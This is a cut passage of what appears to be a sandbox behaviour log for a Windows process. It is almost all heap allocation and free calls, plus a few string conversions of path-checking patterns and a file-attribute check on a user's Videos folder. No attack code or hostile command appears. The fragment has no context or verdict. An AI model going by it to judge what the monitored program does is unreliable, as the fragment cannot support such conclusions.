RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74ec8 [0212.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0212.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0212.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0212.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a78 [0212.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0212.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0212.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0212.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719e8 [0212.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0212.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0212.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0212.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa780 [0212.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0212.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0212.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a08 [0212.164] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0212.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0212.164] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0212.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0212.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0212.165] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0212.165] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0212.165] CharUpperBuffW (in: lpsz="SSA5700E02918", cchLength=0xd | out: lpsz="SSA5700E02918") returned 0xd [0212.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0212.165] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0212.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0212.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0212.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0212.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0212.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0212.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0212.166] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0212.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0212.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0212.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0212.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0212.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0212.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0212.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0212.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0212.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0212.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0212.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0212.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0212.166] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.166] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0212.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0212.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0212.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0212.167] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0212.167] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0212.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0212.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0212.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0212.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0212.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0212.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0212.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0212.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0212.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0212.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0212.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0212.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0212.168] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0212.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0212.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0212.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0212.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0212.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0212.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0212.168] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0212.168] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0212.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x9) returned 0x2aaaa20 [0212.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x2aaaa20, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0212.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x52) returned 0x2a5f9c0 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa68 [0212.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Videos", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x17) returned 0x29f71e0 [0212.169] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\FD1HVy\\Videos", cchWideChar=23, lpMultiByteStr=0x29f71e0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\FD1HVy\\Videos", lpUsedDefaultChar=0x0) returned 23 [0212.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0212.169] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71e0 | out: hHeap=0x2af0000) returned 1 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2e) returned 0x2aa6370 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0212.169] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0212.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0212.170] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77b20, cbMultiByte=23, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0212.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x2e) returned 0x2aa6530 [0212.170] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x2a77b20, cbMultiByte=23, lpWideCharStr=0x2aa6530, cchWideChar=23 | out: lpWideCharStr="C:\\Users\\FD1HVy\\Videos") returned 23 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0212.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6450 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6530 | out: hHeap=0x2af0000) returned 1 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6450 | out: hHeap=0x2af0000) returned 1 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0212.170] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f9c0 | out: hHeap=0x2af0000) returned 1 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0212.170] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0212.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0212.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0212.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0212.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74b20 [0212.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6370 | out: hHeap=0x2af0000) returned 1 [0212.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0212.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0212.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0212.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0212.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0212.171] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0212.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0212.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0212.171] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0212.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0212.171] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\" (normalized: "c:\\users\\fd1hvy\\videos")) returned 0x11 [0212.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0212.171] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0212.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0212.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0212.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.172] PeekMessageW (in: lpMsg=0x8cf618, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf618) returned 0 [0212.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0212.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0212.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0212.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0212.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0212.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0212.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0212.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0212.172] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0212.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0212.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0212.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0212.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0212.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0212.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/:><\\|]|(?s)\\A\\s*\\z", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 